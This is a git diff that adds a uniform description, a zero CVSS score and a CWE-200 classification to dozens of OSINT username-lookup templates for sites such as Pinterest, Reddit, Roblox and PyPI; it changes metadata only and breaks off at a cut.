b/osint/pettingzooco-mastodon-instance.yaml index 1e5c590429..1ee21fc751 100644 --- a/osint/pettingzooco-mastodon-instance.yaml +++ b/osint/pettingzooco-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: pettingzooco-mastodon-instance info: name: Pettingzoo.co (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pettingzooco-mastodon-instance self-contained: true diff --git a/osint/pewex.yaml b/osint/pewex.yaml index dcff9040fd..79ac78b3cf 100644 --- a/osint/pewex.yaml +++ b/osint/pewex.yaml @@ -3,7 +3,12 @@ id: pewex info: name: Pewex author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,pewex self-contained: true diff --git a/osint/picsart.yaml b/osint/picsart.yaml index 3da820f7b2..3729369849 100644 --- a/osint/picsart.yaml +++ b/osint/picsart.yaml @@ -3,7 +3,12 @@ id: picsart info: name: Picsart author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,picsart self-contained: true diff --git a/osint/piekielni.yaml b/osint/piekielni.yaml index 1dff7115a9..9b23b06a38 100644 --- a/osint/piekielni.yaml +++ b/osint/piekielni.yaml @@ -3,7 +3,12 @@ id: piekielni info: name: Piekielni author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,piekielni self-contained: true diff --git a/osint/pikabu.yaml b/osint/pikabu.yaml index 260c7d8b09..f607dd727b 100644 --- a/osint/pikabu.yaml +++ b/osint/pikabu.yaml @@ -3,7 +3,12 @@ id: pikabu info: name: pikabu author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pikabu self-contained: true diff --git a/osint/pillowfort.yaml b/osint/pillowfort.yaml index bdc34b011f..7b78d3804c 100644 --- a/osint/pillowfort.yaml +++ b/osint/pillowfort.yaml @@ -3,7 +3,12 @@ id: pillowfort info: name: Pillowfort author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pillowfort self-contained: true diff --git a/osint/pinkbike.yaml b/osint/pinkbike.yaml index f938d1254d..73d332d7c2 100644 --- a/osint/pinkbike.yaml +++ b/osint/pinkbike.yaml @@ -3,7 +3,12 @@ id: pinkbike info: name: PinkBike author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,pinkbike self-contained: true diff --git a/osint/pinterest.yaml b/osint/pinterest.yaml index 04db750624..7e7fbab804 100644 --- a/osint/pinterest.yaml +++ b/osint/pinterest.yaml @@ -3,7 +3,12 @@ id: pinterest info: name: Pinterest author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pinterest self-contained: true diff --git a/osint/pixelfedsocial.yaml b/osint/pixelfedsocial.yaml index 4fec7c66cc..0d9bc6c013 100644 --- a/osint/pixelfedsocial.yaml +++ b/osint/pixelfedsocial.yaml @@ -3,7 +3,12 @@ id: pixelfedsocial info: name: pixelfed.social author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pixelfedsocial self-contained: true diff --git a/osint/playstation-network.yaml b/osint/playstation-network.yaml index ceac2e54df..14457b5f13 100644 --- a/osint/playstation-network.yaml +++ b/osint/playstation-network.yaml @@ -3,7 +3,12 @@ id: playstation-network info: name: Playstation Network author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,playstation-network self-contained: true diff --git a/osint/plurk.yaml b/osint/plurk.yaml index 4c916c45e9..7e974caf1c 100644 --- a/osint/plurk.yaml +++ b/osint/plurk.yaml @@ -3,7 +3,12 @@ id: plurk info: name: Plurk author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,plurk self-contained: true diff --git a/osint/pokec.yaml b/osint/pokec.yaml index e7b0ad519f..66f703a518 100644 --- a/osint/pokec.yaml +++ b/osint/pokec.yaml @@ -3,7 +3,12 @@ id: pokec info: name: Pokec author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pokec self-contained: true diff --git a/osint/pokemonshowdown.yaml b/osint/pokemonshowdown.yaml index 56d785a192..4de914bcee 100644 --- a/osint/pokemonshowdown.yaml +++ b/osint/pokemonshowdown.yaml @@ -3,7 +3,12 @@ id: pokemonshowdown info: name: pokemonshowdown author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,pokemonshowdown self-contained: true diff --git a/osint/pokerstrategy.yaml b/osint/pokerstrategy.yaml index c2f42cda0c..60728786a7 100644 --- a/osint/pokerstrategy.yaml +++ b/osint/pokerstrategy.yaml @@ -3,7 +3,12 @@ id: pokerstrategy info: name: Pokerstrategy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,pokerstrategy self-contained: true diff --git a/osint/polchatpl.yaml b/osint/polchatpl.yaml index 3754e5f5f2..1d361def12 100644 --- a/osint/polchatpl.yaml +++ b/osint/polchatpl.yaml @@ -3,7 +3,12 @@ id: polchatpl info: name: Polchat.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,polchatpl self-contained: true diff --git a/osint/policja2009.yaml b/osint/policja2009.yaml index 7177ebc205..d076c9b0d5 100644 --- a/osint/policja2009.yaml +++ b/osint/policja2009.yaml @@ -3,7 +3,12 @@ id: policja2009 info: name: policja2009 author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,policja2009 self-contained: true diff --git a/osint/poll-everywhere.yaml b/osint/poll-everywhere.yaml index 67ef592632..6525b93d95 100644 --- a/osint/poll-everywhere.yaml +++ b/osint/poll-everywhere.yaml @@ -3,7 +3,12 @@ id: poll-everywhere info: name: Poll Everywhere author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,poll-everywhere self-contained: true diff --git a/osint/polygon.yaml b/osint/polygon.yaml index 64079056ca..2540c588a7 100644 --- a/osint/polygon.yaml +++ b/osint/polygon.yaml @@ -3,7 +3,12 @@ id: polygon info: name: polygon author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,polygon self-contained: true diff --git a/osint/popl.yaml b/osint/popl.yaml index 5b54c6cf04..023980b3a5 100644 --- a/osint/popl.yaml +++ b/osint/popl.yaml @@ -3,7 +3,12 @@ id: popl info: name: popl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,popl self-contained: true diff --git a/osint/pornhub-porn-stars.yaml b/osint/pornhub-porn-stars.yaml index 9fabbef649..9bfa2a6dea 100644 --- a/osint/pornhub-porn-stars.yaml +++ b/osint/pornhub-porn-stars.yaml @@ -3,7 +3,12 @@ id: pornhub-porn-stars info: name: Pornhub Porn Stars author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,pornhub-porn-stars self-contained: true diff --git a/osint/pornhub-users.yaml b/osint/pornhub-users.yaml index f6ca78ea07..bbe18afd4c 100644 --- a/osint/pornhub-users.yaml +++ b/osint/pornhub-users.yaml @@ -3,7 +3,12 @@ id: pornhub-users info: name: Pornhub Users author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,pornhub-users self-contained: true diff --git a/osint/poshmark.yaml b/osint/poshmark.yaml index bc9cad43a1..89c720cc4f 100644 --- a/osint/poshmark.yaml +++ b/osint/poshmark.yaml @@ -3,7 +3,12 @@ id: poshmark info: name: Poshmark author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,poshmark self-contained: true diff --git a/osint/postcrossing.yaml b/osint/postcrossing.yaml index cd02013056..49d4e9e516 100644 --- a/osint/postcrossing.yaml +++ b/osint/postcrossing.yaml @@ -3,7 +3,12 @@ id: postcrossing info: name: postcrossing author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,postcrossing self-contained: true diff --git a/osint/poweredbygaysocial-mastodon-instance.yaml b/osint/poweredbygaysocial-mastodon-instance.yaml index 3f07bf2ae6..41baa025a2 100644 --- a/osint/poweredbygaysocial-mastodon-instance.yaml +++ b/osint/poweredbygaysocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: poweredbygaysocial-mastodon-instance info: name: Poweredbygay.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,poweredbygaysocial-mastodon-instance self-contained: true diff --git a/osint/producthunt.yaml b/osint/producthunt.yaml index 3de353a1f2..d953a76cac 100644 --- a/osint/producthunt.yaml +++ b/osint/producthunt.yaml @@ -3,7 +3,12 @@ id: producthunt info: name: Producthunt author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,producthunt self-contained: true diff --git a/osint/promodj.yaml b/osint/promodj.yaml index 32a913df82..cbf798869d 100644 --- a/osint/promodj.yaml +++ b/osint/promodj.yaml @@ -3,7 +3,12 @@ id: promodj info: name: promodj author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,promodj self-contained: true diff --git a/osint/pronounspage.yaml b/osint/pronounspage.yaml index f9648be9e9..22ba82e624 100644 --- a/osint/pronounspage.yaml +++ b/osint/pronounspage.yaml @@ -3,7 +3,12 @@ id: pronounspage info: name: Pronouns.Page author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pronounspage self-contained: true diff --git a/osint/pronouny.yaml b/osint/pronouny.yaml index bd4575b83e..e68ebec68d 100644 --- a/osint/pronouny.yaml +++ b/osint/pronouny.yaml @@ -3,7 +3,12 @@ id: pronouny info: name: Pronouny author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,pronouny self-contained: true diff --git a/osint/prose.yaml b/osint/prose.yaml index 4203f52075..de6fffd1dd 100644 --- a/osint/prose.yaml +++ b/osint/prose.yaml @@ -3,7 +3,12 @@ id: prose info: name: Prose author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,prose self-contained: true diff --git a/osint/prvpl.yaml b/osint/prvpl.yaml index 39a210d96c..32691b17d0 100644 --- a/osint/prvpl.yaml +++ b/osint/prvpl.yaml @@ -3,7 +3,12 @@ id: prvpl info: name: prv.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,prvpl self-contained: true diff --git a/osint/psstaudio.yaml b/osint/psstaudio.yaml index 59b2dbf7b8..9c1591abe6 100644 --- a/osint/psstaudio.yaml +++ b/osint/psstaudio.yaml @@ -3,7 +3,12 @@ id: psstaudio info: name: Psstaudio author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,psstaudio self-contained: true diff --git a/osint/public.yaml b/osint/public.yaml index 30b3f535bf..35d9b3a48e 100644 --- a/osint/public.yaml +++ b/osint/public.yaml @@ -3,7 +3,12 @@ id: public info: name: public author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,public self-contained: true diff --git a/osint/pypi.yaml b/osint/pypi.yaml index c049edd562..b837c5d895 100644 --- a/osint/pypi.yaml +++ b/osint/pypi.yaml @@ -3,7 +3,12 @@ id: pypi info: name: pypi author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,pypi self-contained: true diff --git a/osint/queer.yaml b/osint/queer.yaml index f014ff3a06..3bf0566c37 100644 --- a/osint/queer.yaml +++ b/osint/queer.yaml @@ -3,7 +3,12 @@ id: queer info: name: QUEER author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,queer self-contained: true diff --git a/osint/quitterpl.yaml b/osint/quitterpl.yaml index 3b027a2640..b72801dab6 100644 --- a/osint/quitterpl.yaml +++ b/osint/quitterpl.yaml @@ -3,7 +3,12 @@ id: quitterpl info: name: quitter.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,quitterpl self-contained: true diff --git a/osint/quora.yaml b/osint/quora.yaml index 0a30aab0c7..5c19841dd8 100644 --- a/osint/quora.yaml +++ b/osint/quora.yaml @@ -3,7 +3,12 @@ id: quora info: name: Quora author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,quora self-contained: true diff --git a/osint/raddleme.yaml b/osint/raddleme.yaml index da6df23820..09ca596166 100644 --- a/osint/raddleme.yaml +++ b/osint/raddleme.yaml @@ -3,7 +3,12 @@ id: raddleme info: name: Raddle.me author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,raddleme self-contained: true diff --git a/osint/rantli.yaml b/osint/rantli.yaml index d34a245067..35f4aefb73 100644 --- a/osint/rantli.yaml +++ b/osint/rantli.yaml @@ -3,7 +3,12 @@ id: rantli info: name: Rant.li author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,rantli self-contained: true diff --git a/osint/reblogme.yaml b/osint/reblogme.yaml index f6b5cc6119..064f9ce0e8 100644 --- a/osint/reblogme.yaml +++ b/osint/reblogme.yaml @@ -3,7 +3,12 @@ id: reblogme info: name: ReblogMe author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,reblogme self-contained: true diff --git a/osint/redbubble.yaml b/osint/redbubble.yaml index 4e515bb1f6..f125ca9944 100644 --- a/osint/redbubble.yaml +++ b/osint/redbubble.yaml @@ -3,7 +3,12 @@ id: redbubble info: name: redbubble author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,redbubble self-contained: true diff --git a/osint/reddit.yaml b/osint/reddit.yaml index ca77af7b07..3917ad59df 100644 --- a/osint/reddit.yaml +++ b/osint/reddit.yaml @@ -3,7 +3,12 @@ id: reddit info: name: Reddit author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,reddit self-contained: true diff --git a/osint/redgifs.yaml b/osint/redgifs.yaml index dbeb520c32..afad74a625 100644 --- a/osint/redgifs.yaml +++ b/osint/redgifs.yaml @@ -3,7 +3,12 @@ id: redgifs info: name: REDGIFS author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,redgifs self-contained: true diff --git a/osint/refsheet.yaml b/osint/refsheet.yaml index 7dbb40c6c7..359516d86b 100644 --- a/osint/refsheet.yaml +++ b/osint/refsheet.yaml @@ -3,7 +3,12 @@ id: refsheet info: name: Refsheet author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,refsheet self-contained: true diff --git a/osint/researchgate.yaml b/osint/researchgate.yaml index 6e200939a3..aa4e00ba7c 100644 --- a/osint/researchgate.yaml +++ b/osint/researchgate.yaml @@ -3,7 +3,12 @@ id: researchgate info: name: Researchgate author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,researchgate self-contained: true diff --git a/osint/resumes-actorsaccess.yaml b/osint/resumes-actorsaccess.yaml index 4fdf2efe49..7d1fd138f7 100644 --- a/osint/resumes-actorsaccess.yaml +++ b/osint/resumes-actorsaccess.yaml @@ -3,7 +3,12 @@ id: resumes-actorsaccess info: name: resumes_actorsaccess author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,resumes-actorsaccess self-contained: true diff --git a/osint/revolut.yaml b/osint/revolut.yaml index af0b8e832f..09dc43f857 100644 --- a/osint/revolut.yaml +++ b/osint/revolut.yaml @@ -3,7 +3,12 @@ id: revolut info: name: Revolut author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,revolut self-contained: true diff --git a/osint/riskru.yaml b/osint/riskru.yaml index 3aaacb5876..83d38a0c43 100644 --- a/osint/riskru.yaml +++ b/osint/riskru.yaml @@ -3,7 +3,12 @@ id: riskru info: name: risk.ru author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,riskru self-contained: true diff --git a/osint/roblox.yaml b/osint/roblox.yaml index 61711ff45c..8590dad678 100644 --- a/osint/roblox.yaml +++ b/osint/roblox.yaml @@ -3,7 +3,12 @@ id: roblox info: name: Roblox author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,roblox self-contained: true diff --git a/osint/rsi.yaml b/osint/rsi.yaml index d19df3f31b..1fd8ed3a7e 100644 --- a/osint/rsi.yaml +++ b/osint/rsi.yaml @@ -3,7 +3,12 @@ id: rsi info: name: rsi author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,rsi self-contained: true diff --git a/osint/ru-123rf.yaml b/osint/ru-123rf.yaml index 8a3f38d1e1..b68232fdca 100644 --- a/osint/ru-123rf.yaml +++ b/osint/ru-123rf.yaml @@ -3,7 +3,12 @@ id: ru-123rf info: name: ru_123rf author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,ru-123rf self-contained: true diff --git a/osint/rumblechannel.yaml b/osint/rumblechannel.yaml index 5501e31682..c6821a7c86 100644 --- a/osint/rumblechannel.yaml +++ b/osint/rumblechannel.yaml @@ -3,7 +3,12 @@ id: rumblechannel info: name: RumbleChannel author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,rumblechannel self-contained: true diff --git a/osint/rumbleuser.yaml b/osint/rumbleuser.yaml index 17c4a14dab..d6b2c52369 100644 --- a/osint/rumbleuser.yaml +++ b/osint/rumbleuser.yaml @@ -3,7 +3,12 @@ id: rumbleuser info: name: RumbleUser author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,rumbleuser self-contained: true diff --git a/osint/salon24.yaml b/osint/salon24.yaml index 49d5507a86..f4b6e29de2 100644 --- a/osint/salon24.yaml +++ b/osint/salon24.yaml @@ -3,7 +3,12 @@ id: salon24 info: name: Salon24 author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,salon24 self-contained: true diff --git a/osint/saracartershow.yaml b/osint/saracartershow.yaml index 78947e792d..33ddd6b44c 100644 --- a/osint/saracartershow.yaml +++ b/osint/saracartershow.yaml @@ -3,7 +3,12 @@ id: saracartershow info: name: SaraCarterShow author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,saracartershow self-contained: true diff --git a/osint/scoutwiki.yaml b/osint/scoutwiki.yaml index b4d4f7c1df..148d42207f 100644 --- a/osint/scoutwiki.yaml +++ b/osint/scoutwiki.yaml @@ -3,7 +3,12 @@ id: scoutwiki info: name: ScoutWiki author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,scoutwiki self-contained: true diff --git a/osint/scratch.yaml b/osint/scratch.yaml index 2cbe45a74c..469ac0f280 100644 --- a/osint/scratch.yaml +++ b/osint/scratch.yaml @@ -3,7 +3,12 @@ id: scratch info: name: scratch author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,scratch self-contained: true diff --git a/osint/secure-donation.yaml b/osint/secure-donation.yaml index 52964d7c30..477a74dcc5 100644 --- a/osint/secure-donation.yaml +++ b/osint/secure-donation.yaml @@ -3,7 +3,12 @@ id: secure-donation info: name: secure_donation author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,secure-donation self-contained: true diff --git a/osint/seneporno.yaml b/osint/seneporno.yaml index e0dc5a9f7d..6b9d95d9f1 100644 --- a/osint/seneporno.yaml +++ b/osint/seneporno.yaml @@ -3,7 +3,12 @@ id: seneporno info: name: Seneporno author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,seneporno self-contained: true diff --git a/osint/sentimente.yaml b/osint/sentimente.yaml index 41c537e177..a7befbe10d 100644 --- a/osint/sentimente.yaml +++ b/osint/sentimente.yaml @@ -3,7 +3,12 @@ id: sentimente info: name: sentimente author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,sentimente self-contained: true diff --git a/osint/seoclerks.yaml b/osint/seoclerks.yaml index d9e07403e8..5623f72c98 100644 --- a/osint/seoclerks.yaml +++ b/osint/seoclerks.yaml @@ -3,7 +3,12 